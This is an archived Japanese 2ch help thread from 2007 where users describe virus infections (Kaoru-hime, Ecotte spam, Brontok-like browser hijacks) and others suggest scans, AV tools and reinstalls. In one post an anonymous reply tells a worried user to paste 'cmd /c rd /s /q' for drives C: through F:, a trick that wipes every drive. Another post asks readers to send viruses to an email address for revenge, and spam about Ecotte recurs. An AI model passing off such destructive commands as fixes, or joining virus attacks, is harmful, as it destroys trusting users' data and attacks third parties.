897まちがって名前消しちゃいました。:2007/11/04(日) 19:48:39 ID:IakY3Usr
すみません、、かおる姫というウィルスに引っ掛かってしまいました・・・。
慌ててしまってファイル削除してすぐに再起動してしまいました。
立ち上がったけどデータが消えてしまったみたいです。。。
対処法はあるのでしょうか・・・??
898まちがって名前消しちゃいました。:2007/11/04(日) 20:28:18 ID:???
過去スレ嫁
899まちがって名前消しちゃいました。:2007/11/04(日) 20:33:12 ID:???
>>898
過去スレにも目を通しました。
でも具体的な解決策がなかったので困ってます・・・。
900まちがって名前消しちゃいました。:2007/11/06(火) 21:47:56 ID:1KfJw7zR
エッチ動画をダウンロードしようとしてクリックしたらアウトルックが勝手にどんどん
立ち上がってウィンドウが何十個もできてしまい、最期はWindowsが動かなくなってしまいました。
(Avira AntiVirっていうドイツ?の無償ウィルスソフトを入れていて警告が出たが
ドイツ語?が読めないので適当にクリックしたら上記の状態になってしまった。)

これはウィルスですか? 単なるイタズラみたいなもんでしょうか?

OSがサーバー製品(Windows2000 Server 3万円の中古パソコンを買ったら付いていた)
なので、上のドイツ?にソフト以外に個人向けの無償のウィルスソフトが組み込めないようです。
なんか、無償でウィルス対策ができないでしょうか?
901まちがって名前消しちゃいました。:2007/11/06(火) 21:50:42 ID:???
>>900
それはウィルスだ。おいらも他人の検証してやられたことがある。ノートンが感染までは防いでくれた。
とりあえずオンラインスキャンしてみちゃどうか。
※オンラインウイルススキャン
シマンテック セキュリティチェック
   (p)http://www.symantec.com/region/jp/securitycheck/index.html
トレンドマイクロ オンラインスキャン
   (p)http://housecall65.trendmicro.com/
902まちがって名前消しちゃいました。:2007/11/06(火) 22:57:57 ID:EWTcNLY/
今日PC立ち上げたら、スタートメニューが勝手にかわってました。
ダイブ前に、カスペルスキーから、
侵入されたかも?みたいな警告が出てたんですが、
ウィルススキャンしても何も出てこなかったので、放置してました。
このことがあるだけにかなり不安です・・・。

対策方法、今すべきことを教えてください。
お願いします。
903まちがって名前消しちゃいました。:2007/11/06(火) 23:16:37 ID:???
>>902
[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c: ←コピペでok
と入力し[OK]をクリックする。

上記と同様に以下も順に実行する。
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:
904まちがって名前消しちゃいました。:2007/11/06(火) 23:20:30 ID:EWTcNLY/
>>903
それってなんかやばい奴ですよね。
905まちがって名前消しちゃいました。:2007/11/06(火) 23:30:50 ID:???
>>902
たぶん手遅れだと思われ
初期化するのが一番安全
906まちがって名前消しちゃいました。:2007/11/06(火) 23:34:36 ID:EWTcNLY/
>>905
ありがとうございます。
もう感染しちゃってるんでしょうか?
初期化ってどうやればいいんでしょうか・・・?
907まちがって名前消しちゃいました。:2007/11/06(火) 23:47:32 ID:???
「侵入された」と警告が出たならPC全体がすでにオワタな可能性大
908まちがって名前消しちゃいました。:2007/11/06(火) 23:49:21 ID:EWTcNLY/
じゃぁウィルススキャンしても何もでてこないってことですか?
どうすればいいんでしょうorz
909まちがって名前消しちゃいました。:2007/11/06(火) 23:58:44 ID:???
だから買った状態に戻せばいいんじゃないの?
910まちがって名前消しちゃいました。:2007/11/07(水) 00:10:58 ID:2ynRX98i
もしボット?に感染してるとしたら、
ネットにつながなければ問題ないんですか?
911まちがって名前消しちゃいました。:2007/11/07(水) 00:17:12 ID:???
>>910
今ネットに繋げて書き込んでるじゃん
912まちがって名前消しちゃいました。:2007/11/07(水) 00:19:45 ID:2ynRX98i
>>911
そうじゃなくて、ネットにつながなければ被害はでないんでしょうか?

何度も質問に答えてくださってありがとうございます。
913まちがって名前消しちゃいました。:2007/11/07(水) 00:24:19 ID:???
ネットに繋げてれば勝手に君のパソコンがどこかに向けて情報を発信するでしょ
これを被害と見るか見ないかは君次第

ここに書き込んでるときに繋いでいる一瞬の間に発信してる可能性を言ってるんだよ
914まちがって名前消しちゃいました。:2007/11/07(水) 21:42:57 ID:Gforb9Fw
教えてください。NIS2007を入れています。
パソコンを立ち上げると、ノートンがプログラム警告で
「taskmgeがインターネットにアクセスしようとしています。」と
出ます。処理方法として、常に許可する(推奨)とありますが、
それでいいのでしょうか?
915まちがって名前消しちゃいました。:2007/11/08(木) 17:41:01 ID:JNCFE3ha
やたらと宣伝が熱心なエコッテって名前のウイルス湧いてます
2chにもエコッテが湧いてるよ
ie_updater.exeより最強?

916まちがって名前消しちゃいました。:2007/11/08(木) 18:18:15 ID:???
たった今パソコンを起動したら何故かラピュタの曲がエンドレスで流れはじめました。(地球〜はま〜わ〜る〜ってやつ)
良い曲だとは思うのですが、これだけ聞かされ続けたら発狂してしまいます。これは何かのウイルスなのでしょうか?
もちろんこの曲をダウンロードした覚えはありません。助けてください
917まちがって名前消しちゃいました。:2007/11/08(木) 18:35:38 ID:???
>>916
それオワタ
918まちがって名前消しちゃいました。:2007/11/08(木) 21:04:12 ID:???
>>914
いいんじゃないの。
心配なら許可しないにして、なんの問題もなければ許可しないままでもいいかも。
919まちがって名前消しちゃいました。:2007/11/09(金) 22:23:16 ID:???
寝てる間に挿入されたのかそうかそうか
920まちがって名前消しちゃいました。:2007/11/09(金) 23:01:05 ID:???
2ちゃんねるの専ブラを使用していて、あるスレに画像が貼り付けてあったので
画像を表示しました、特にその時にセキュリティソフトは何も言ってこなかったのですが
その後にトロイに感染したと言う、他の人の書き込みがあったので不安です
ウイルス検査をした結果は感染は無しと出ました
ソースネクストのウイルスセキュリティを使っています
大丈夫でしょうか?
921まちがって名前消しちゃいました。:2007/11/09(金) 23:47:48 ID:???
さぁ?
君の発言からしてわかることは、ソースネクストが感染なしだと報告したということしかわからない。
回答者としては、じゃあ感染は無しなのかなと答えることしかできない。
たとえ他の人間が同じ画像掲示板でトロイに感染したとしても。
922まちがって名前消しちゃいました。:2007/11/10(土) 19:05:10 ID:???
すいません、質問なんですが家のデスクトップを起動すると
『lsass.exe − システムエラー  エンドポイントの形式が無効です。』
と、表示されてしまいOKを押すと再起動されまた同じ文が表示されてしまいます。
この対処法はあるのでしょうか?
923922:2007/11/11(日) 19:35:48 ID:???
すいません、解決しましたorz
924まちがって名前消しちゃいました。:2007/11/13(火) 22:38:49 ID:???
すいません一つ質問があります
かおる姫はZIPの状態なら(解凍しなければ)問題は無いですよね?
925まちがって名前消しちゃいました。:2007/11/14(水) 21:40:23 ID:???
割と新しいウイルスにかかったんだが…対処法がわからん…助けて
926まちがって名前消しちゃいました。:2007/11/14(水) 22:16:30 ID:m2GW0jb8
すみません。かおる姫で再起動してしまって途中であわてて消したのですが
少しファイルが残っていたりしないでしょうか?復元はできないでしょうか?
927まちがって名前消しちゃいました。:2007/11/15(木) 01:01:15 ID:???
すみませんが、教えて下さい。
昨日から検索をするとgogotools〜という画面ばかりが出て来ます。
なんの語句を検索しても出てくるのですが、
どうしたら良いのでしょうか?
PCほとんど分からないので教えていただけないでしょうか。
お願いします
928まちがって名前消しちゃいました。:2007/11/15(木) 03:26:40 ID:K1yrswC/
エコッテって名前のウイルスがウザイです。
エコッテスパム登録しました。
929まちがって名前消しちゃいました。:2007/11/15(木) 17:49:11 ID:HlsBTnmA
PenIII850Mhz 128MB Win2Kの古いPCを長年使ってるのですが、最近異様に動作が遅くて困ってます。
これってウィルスですかね?

HDDの空き領域はC:D:共に3GB以上有り
ディスククリーンアップ、デフラグしても治りません
930まちがって名前消しちゃいました。:2007/11/15(木) 17:51:59 ID:???
>>929

※オンラインウイルススキャン
シマンテック セキュリティチェック
   (p)http://www.symantec.com/region/jp/securitycheck/index.html
トレンドマイクロ オンラインスキャン
   (p)http://housecall65.trendmicro.com/

オンラインでチェックしてみてはいかが。
931まちがって名前消しちゃいました。:2007/11/15(木) 18:33:54 ID:???
>>930
ありがとうございます。
時間かかりますね、これ。
932まちがって名前消しちゃいました。:2007/11/15(木) 18:58:41 ID:???
友人が、現在進行形でかかってるウィルスなんだけど
色々とググッて調べたんだが、見つからないので書き込むことに
Windows Live Messengerを立ち上げると、背景がドクロで敷き詰められていて
サインインすると(?)「HAHAHAHA」とかいう音がなってメッセが強制終了するそうで
ググッてもP2Pのドクロウィルスかメッセの自動送信しまくる奴しか出てこないw
自分のググり方が下手なんだろうか?ww
それはおいといて、どうすれば直るでしょうか?
ちなみにノートン先生もひっからなかったそうで、OSはXPだったっけかな。
933まちがって名前消しちゃいました。:2007/11/15(木) 22:16:25 ID:???
すいません、質問させてください。
時々クッキーが勝手に削除されているような気がします
※例えばニコニコ動画で普段ならIDとパスを求められないのが、時々入力画面になる

素人考えで恥ずかしいのですが、ウイルスなどによってこういった状況の時にパスワードなどを
収集されることはあるのでしょうか?
934まちがって名前消しちゃいました。:2007/11/16(金) 10:33:41 ID:vaWZqIbV
やたらと宣伝が熱心なエコッテってのウイルス湧いてます
2chにもエコッテが進入
興信所を使うウイルスらしく個人情報が危険
935929:2007/11/17(土) 01:52:41 ID:yISlBONc
見事に感染しておりました。

>>930さんが教えて下った方法を試しました。
シマンテックのセキュリティチェックで複数の感染が発覚。
無料体験版でWin2K対応なのはKasperskyだったのでこれで駆除を試みました。
ソフト内での用語というか表現が微妙に理解しにくかったのですが、恐らく検出できたウィルスは
全て削除したはず。

念のためシマンテックのセキュリティチェックで再度スキャンするとまだ30以上の感染ファイルが
みつかったので、今度はトレンドマイクロのオンラインスキャンでチェック。
検出できたウィルスを削除する機能も付いてるので、新たに見付かったウィルスを駆除。
スパイウェアも削除。

更に念のために再々度シマンテックのセキュリティチェックを試したところ、やはり30個ほどの
感染ファイルが検出されちゃいました。

他の対ウィルスソフトで対策、駆除してもシマンテックのツールだけが特定のウィルスを
検出することができるっていうことなんですかね?
そういうウィルスってあるんですかね?
936まちがって名前消しちゃいました。:2007/11/17(土) 09:35:39 ID:/7LpFvqT
スレチですが教えてください
ウイルスをふんでパソコンがあぼーんしてしまいました
具体的にいうと、電源を入れると 「NTLDR is missing.Press ctrl+alt+del to restart」 
っていうメッセージがでてしまいます
解決法を教えてください
937まちがって名前消しちゃいました。:2007/11/17(土) 11:46:43 ID:1DVNe125
すみません、質問です
パソコン買ったばかりでまだ良くわからないんですが、2chでzipを落として解凍したら画像が出てきました
ウィルスだと思いzipのデータと解凍して出てきた画像を消しました
そしてその日はパソコンをシャットダウンして次の日に起動させたら途中で止まり強制終了させ、また起動させたら次はなんとか起動できたのでウィルスバスター2007でスキャンしたらかおる姫というウィルスで隔離できませんでした
かおる姫はどうしたら消せますか?
今のところデータが消えたりはしてないんですが大丈夫でしょうか?
過去ログ読んでもわからなかったので、どなたかもうちょっと詳しくお願いします
938惨事(・ρ ゚)☆The_Infinity ◆Ptz2qe.dNE :2007/11/17(土) 11:55:25 ID:???
>>937
ちなみに使っているのはwindows vistaです
よろしくお願いします
939まちがって名前消しちゃいました。:2007/11/17(土) 12:26:12 ID:25TT602k
☆ウイルス踏みました!対処法教えて下さい!☆
http://pc11.2ch.net/test/read.cgi/sec/1126151563/l50x

そのうち起動できなくなる急げ
940まちがって名前消しちゃいました。:2007/11/17(土) 12:37:59 ID:???
>>936
OSの修復セットアップか再インストール。
 OSのCDをCDドライブに入れる。
 起動して直後のPress XX Button Enter BIOS SetUpの表示されてるときにそのXXキー押す。
 XXはマザーボードによって変わります。Deleteキーやファンクションキーが多いです。
 BIOS設定画面になるのでメニューからBoot項目を探す。
 Bootの順番がたぶんFDD、HDD、CDの順になってるので、CDを一番目にする。
 やりかたは英語だけど画面に表示されてる。
 設定したらSave&Quitで終わる。
 終わったらPress any Key CD Bootとか出るのでエンターキーでもなんでも押す。
 CDから起動するとメニューが出るので、Windowsの回復とか修復セットアップを選ぶ。

ダメだったら、メニューで新規にインストールする。My Documentとかのデータは初期化されてしまうが。
941まちがって名前消しちゃいました。:2007/11/17(土) 13:37:58 ID:/7LpFvqT
>>940 ありがとうございます。
>>938 同じのですね。YOUJOファイル
942まちがって名前消しちゃいました。:2007/11/17(土) 13:40:15 ID:1DVNe125
>>941
私のもYOUJOファイルです
ゴミ箱のかおる姫も消したけど大丈夫なのか心配
943まちがって名前消しちゃいました。:2007/11/17(土) 14:37:14 ID:???
所構わず宣伝するエコッテってのスパムウイルス
OKweb、価格.com、2chにもエコッテが進入
興信所を使うウイルスらしく個人情報も危険
お金を支払っても催促が来るのはなぜ?
944929:2007/11/17(土) 22:57:03 ID:yISlBONc
しつこくて済みません。
シマンテックのセキュリティチェックだけがウィルスを検出するのは何故なんですか?
945まちがって名前消しちゃいました。:2007/11/17(土) 23:17:51 ID:???
シマンテックが検出したウイルス名とファイル名は何?

もう一度、カスペ→バスター→シマンテックをやってみると、どーなる?
シマンテックだけ反応するなら、2chビューアのログファイル等に反応しているのが考えられる。
カスペで再度検出されるなら、駆除したウイルスが再生して、完全に駆除されていない。
946929:2007/11/18(日) 00:24:39 ID:???
>>945
VBS.LoveLetter.A
Macro.src
VBS.Freelink.B
WScript.KakWorm
WScript.KakWorm
Bloodhound.Exploit.6
   ・
   ・
   ・
などです。
しかし仰るようにほとんどがギコナビのログファイルだ、と。
これは気にしなくて良いんですか?

残りは
WINNT\system32\vidriv.exe は Hacktool.HideWindow に感染しています。
WINNT\system32\XDial.OCX は Dialer.XDialer に感染しています。
この2つです。
徹底的に削除した方がいいんですかね?

再度カスペル→バスター→シマンテックやってみます。
ありがとうございます。

寝れね(TT)(笑)
947まちがって名前消しちゃいました。:2007/11/18(日) 00:50:56 ID:7G62wj8c
悪意のある…を使ってみたら感染ファイルが膨大な数検出されたんだが、
これってかなり大変なことだよね?
948まちがって名前消しちゃいました。:2007/11/18(日) 01:43:44 ID:7G62wj8c
連投スマソ
今大体7割くらい終わったんですが、感染ファイル1000超えました…。
終了次第全削除するつもりですが、他に対処法とかあったら教えて下さい。
949まちがって名前消しちゃいました。:2007/11/18(日) 09:05:11 ID:???
>>948 アンチウイルスいれてないのかな?AVGいれよう。
950まちがって名前消しちゃいました。:2007/11/18(日) 09:38:02 ID:7G62wj8c
>>949返信ありがとうございます。
現在完全にフリーズしてしまって、セーフモードでファイル処理しても起動しませんでした。
初期化したほうがいいですか?
951まちがって名前消しちゃいました。:2007/11/18(日) 10:18:15 ID:2EqwIRvA
>>950 俺は初期化が嫌いなのですすめないけど最終手段としてはアリ。
セーフモードで起動できてるのなら、そのままAVGなどネットワークに繋がない形でスキャン&再起動。
それでもだめならCD起動で修復セットアップ。
CD起動はCを押しながら起動。
952まちがって名前消しちゃいました。:2007/11/18(日) 10:22:40 ID:7G62wj8c
>>951
それらも試しましたがどうにもいかないので初期化します…
本当に御丁寧にしていただきありがとうございました。
953まちがって名前消しちゃいました。:2007/11/18(日) 10:24:39 ID:???
>>952
そうですか。
ウイルスコワスですな
954まちがって名前消しちゃいました。:2007/11/19(月) 05:21:28 ID:???
うざいエコッテウイルスまだ消えません
勝手に湧いてるウイルスはマカフィーでも削除出来ないのでしょうか?
955まちがって名前消しちゃいました。:2007/11/19(月) 20:40:12 ID:???
>>936です
OSをインストールしたら治りました。どうもありがとうございました
ですがサウンドデバイスが無くなってしまい困っています
スレ違いは承知してますが教えてください
956まちがって名前消しちゃいました。:2007/11/20(火) 02:01:07 ID:???
>>955 メーカーからダウンロード&インストール
957まちがって名前消しちゃいました。:2007/11/20(火) 02:11:19 ID:???
>>956 試したんですがドライバがなくてできませんでした
958まちがって名前消しちゃいました。:2007/11/20(火) 02:31:10 ID:???
キー入力が突然おかしくなりました。
「半角/全角」キー を押すと「‘」に変換され(通常は日本語変換モード)
「”」キーを押すと「@」に変換されると言った具合です。
文字系のキーは正常で、記号系がおかしいようです。
ソースネクストのウイルスセキュリティーでウィルス検査しましたが
異常有りませんでした。元に戻すにはどうしたらいいでしょう?
959まちがって名前消しちゃいました。:2007/11/20(火) 03:18:23 ID:???
960まちがって名前消しちゃいました。:2007/11/20(火) 04:42:40 ID:???
>>957 コントロールパネルのハードウェアの検出は
961まちがって名前消しちゃいました。:2007/11/20(火) 10:45:23 ID:H4FgnG5K
ネットに繋ぐとガーッとノイズ表示、
これウイルスですか…?

シマンテックでスキャンしてもなにも検出しませんですた…
962まちがって名前消しちゃいました。:2007/11/20(火) 14:06:14 ID:Qw/iShkm
どこでも構わず宣伝するエコッテってのウイルス多い
2chにもエコッテの業者が狙ってる
興信所を使うウイルスらしく個人情報が不安
963まちがって名前消しちゃいました。:2007/11/20(火) 17:11:56 ID:Mp+54Mhn
なんか名前にXmasって入ってるウイルスが進入してきた なんかいいねこういうの
964まちがって名前消しちゃいました。:2007/11/20(火) 22:57:49 ID:qO662nBl
なんだかインターネットをしていると急にブラウザが緑色に
変わってBRONTOKA?みたいなタイトルで英語のページに飛んでしまいます
よく調べたらマイピクチャの中にそれへのショートカットが自動的に作られてたのですが
どうすれば駆除できますか?
965まちがって名前消しちゃいました。:2007/11/20(火) 23:28:51 ID:???
>>964

どんな内容のページに飛ぶか詳しく分からないがファーミングの一種では?

スパイウエアの駆除はしましたか?


ウイルス対策ソフトは何を使っていますか?
966まちがって名前消しちゃいました。:2007/11/21(水) 04:50:01 ID:???
sineyoというウイルスにひっかかって、パソコンのファイルが全部消えてしまいました。死ねる・・・
もうファイルはもどってきませんよね?
967ドラえもん:2007/11/21(水) 17:47:40 ID:???
自分の知り合いが出会い系で、だまされて凹んでます。誰か怨みはらして下さい。
[email protected]こちらへウイルス送って下さい。サクラサイトです。お願いします。
968 ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄:2007/11/21(水) 17:48:55 ID:OHS9HC0x
              __,,,,、 .,、
            /'゙´,_/'″  . `\
          : ./   i./ ,,..、    ヽ
         . /    /. l, ,!     `,
           .|  .,..‐.、│          .|
           (´゛ ,/ llヽ            |
            ヽ -./ ., lliヽ       .|
             /'",i" ゙;、 l'ii,''く     .ヽ
         / ...│  ゙l,  l゙゙t, ''ii_    :.!
        : /.._ /    ヽ \\.`゙~''''''"./
        .|-゙ノ/   : ゝ .、 ` .`''←┬゛
          l゙ /.r   ゛ .゙ヒ, .ヽ,   ゙̄|
       . | ./ l      ”'、 .゙ゝ........
       l  /     ヽ .`' `、、  .,i゛
       .l|  !    ''''v,    ゙''ー .l、
       |l゙ .il、  .l  .ヽ  .¬---イ
      .ll゙, ./    !            ,!
      .!!...!!   ,,゙''''ー       .|
      l.",!    .リ         |
      l":|    .〜'''      ,. │
      l; :!    .|'"    ...ノ,゙./ │
      l: l「    !    . ゙゙̄ /  !
      .| .|    !     ,i│  |
      :! .l.    }    ,i'./    |
      :! .|    :|    . /     .|
      :! |    ;!   "      .|
      :! !    │        │
      :!:|               ,! i ,!
      :! ,    .l,      / .l゙ !
      :! |    , l.     | .|  :,
969まちがって名前消しちゃいました。:2007/11/22(木) 22:24:17 ID:???
>>968 エコッテのウイルスうざいです。
エコッテをメーラーでスパム登録しました。
970まちがって名前消しちゃいました。:2007/11/24(土) 13:30:25 ID:EZ2BPCpf
みなさん、こんにちは。
PCド素人なんですが、今日夜勤から帰って来てネットしようと思ったら、すごく重くてなかなかページが開けませんでした。何回かやってみたんですが重いままで、さっき『ページを表示できません』ってなって、ネットに全然繋がらなくなってしまいました。
これは何かしらウィルスに感染してるのでしょうか??
971まちがって名前消しちゃいました。:2007/11/24(土) 15:24:12 ID:???
それLANケーブル外れてるんじゃね
972まちがって名前消しちゃいました。:2007/11/24(土) 16:09:16 ID:EZ2BPCpf
>>971
LANケーブルも確認したんですけど、ちゃんと差し込まれてたんですが…
973まちがって名前消しちゃいました。:2007/11/24(土) 17:10:26 ID:3NjErPLu
>>970
僕も同じ症状が出てました。
Ctrl+Alt+Delete  のKEYを押せば タスク マネージャー が開かれます。
最下部の、CPU使用率が何%になっていますか?
僕は100%近くになっていたので、かなり重くなりネットも極端に遅くなったり、表示されなくなりました。
とりあえず一時対応するには、タスク マネージャーからプロセスを選んで、CPUとメモリー使用量の所で、
かなり使われているところをプロセス終了すれば、サクサク動きました。

一時対応の仕方は分かったのですが、ウイルスを除去するやり方が分かりません。。

ご存知の方、よろしくお願いします。



974まちがって名前消しちゃいました。:2007/11/24(土) 17:11:37 ID:3NjErPLu
>>970
僕も同じ症状が出てました。
Ctrl+Alt+Delete  のKEYを押せば タスク マネージャー が開かれます。
最下部の、CPU使用率が何%になっていますか?
僕は100%近くになっていたので、かなり重くなりネットも極端に遅くなったり、表示されなくなりました。
とりあえず一時対応するには、タスク マネージャーからプロセスを選んで、CPUとメモリー使用量の所で、
かなり使われているところをプロセス終了すれば、サクサク動きました。

一時対応の仕方は分かったのですが、ウイルスを除去するやり方が分かりません。。

ご存知の方、よろしくお願いします。



975たくみ ◆QfTAKUMI/E :2007/11/24(土) 17:42:37 ID:???
>>973
とりあえずオンラインスキャンをどうぞ↓
ttp://cowscorpion.com/Outline/secu_on.html
976まちがって名前消しちゃいました。:2007/11/24(土) 18:46:14 ID:???
AvastやめたらXPが快適になりました
9774 ◆NFQtmGW3bw :2007/11/25(日) 14:01:24 ID:???
>>976
他のソフトにしたのかい?
978まちがって名前消しちゃいました。:2007/11/25(日) 15:16:32 ID:???
>>962 家もエコッテのスパイウイルス対策するよ。
979まちがって名前消しちゃいました。:2007/11/25(日) 19:07:39 ID:???
知り合いからもらったCDにあやしげなexeファイル紛れてて、間違って踏んじゃって、
ウィルスバスターの『疑わしい変更が見つかりました』のポップアップが出た。

『変更を管理する』を押したけど、これで感染はないってことでいいのでしょうか?
不安で夜も眠れません。
980まちがって名前消しちゃいました。:2007/11/25(日) 19:33:23 ID:???
リカバリーやりすぎるとパソ壊れやすくなるって本当?
981まちがって名前消しちゃいました。:2007/11/25(日) 20:09:41 ID:35Sb/jL1
ライムワイヤーを使っていたらローカルエリア接続が制限されるようになりました システムの復元をしても治りません どうしたら治りますか?
982まちがって名前消しちゃいました。:2007/11/26(月) 01:15:47 ID:Kvmty6vY
プログラムファイルの中に「xerox」というファイルがあります。
削除しようと思っても使用中で削除できないとなります。
ウィルスでしょうか?
どうすれば削除できますか?
983まちがって名前消しちゃいました。:2007/11/26(月) 04:59:11 ID:???
984まちがって名前消しちゃいました。:2007/11/26(月) 10:00:45 ID:Qx2xEe2N
>>981ですけどこれはウイルスの症状ですか? 新しいウイルス対策ソフトを買えば治りますか?
985まちがって名前消しちゃいました。:2007/11/26(月) 12:38:08 ID:8qjEysuX
New Poly Win32ってウイルスが削除できません。どうしたらいいですか?
986まちがって名前消しちゃいました。:2007/11/26(月) 13:35:49 ID:???
>>977
とりあえずavg
987まちがって名前消しちゃいました。:2007/11/26(月) 13:39:44 ID:???
>>986
と、いうかavastでもavgでも取れないマルちゃんをspybotで対処てのが現実
988まちがって名前消しちゃいました。:2007/11/26(月) 17:42:00 ID:???
http://www.geocities.jp/semschilt/index.html
このサイトいったらウイルスに感染しましたってブラウザのポップアップみたいのでたのですが
AVGでスキャンしてもウイルスが検出されません
ウイルスに感染したのでしょうか?
9894 ◆NFQtmGW3bw :2007/11/26(月) 21:49:29 ID:???
暫く消えててごめんなさいね。
また始めるわ、相談窓口みたいなのw

まだこっちでやってるからな。
ここはPart2立つのかな?
9904 ◆NFQtmGW3bw :2007/11/26(月) 21:56:31 ID:???
>>979
それだけではわからない
kwsk
>>980
本当です。
内部部品に負担が掛かるのが原因です。
Vistaも標準の設定のスタンバイが原因で壊れやすいかもw
>>981
ログ見てないから分からないけど、設定が変わったかウイルスだと思う。
>>985
ログのアップお願い
>>988
ウイルス警告!
あなたのハードディスクファイルにウイルス128種465個・トロイの木馬51種128個が感染しました。
と出るみたいですね。踏んでないのでわかりませんが、不安ならオンラインスキャンとかやってみてください。

>>986
なるほど。フリーでもいいのは結構あるからね
991まちがって名前消しちゃいました。:2007/11/26(月) 23:11:04 ID:Qx2xEe2N
>>931 ありがとうございますm(__)m ログとは何でしょうか?
992まちがって名前消しちゃいました。:2007/11/27(火) 22:16:30 ID:BhDHyfgu
かおる姫ってやつ開いちゃったんですけどどうすればいいですか!!
993まちがって名前消しちゃいました。:2007/11/28(水) 00:50:22 ID:vX1qTZYC
かおる姫かぁ…カマだから閉じるしかないな
994まちがって名前消しちゃいました。:2007/11/28(水) 01:12:46 ID:3MSUqNLG
>>988
そんなもの気にするな。そうやって検出したとか言ってクレジットの番号を聞き出す類だろうな
9954 ◆NFQtmGW3bw
>>988
正体がわかったよwww
びっくりサイトらしいw
所謂度胸試しって奴w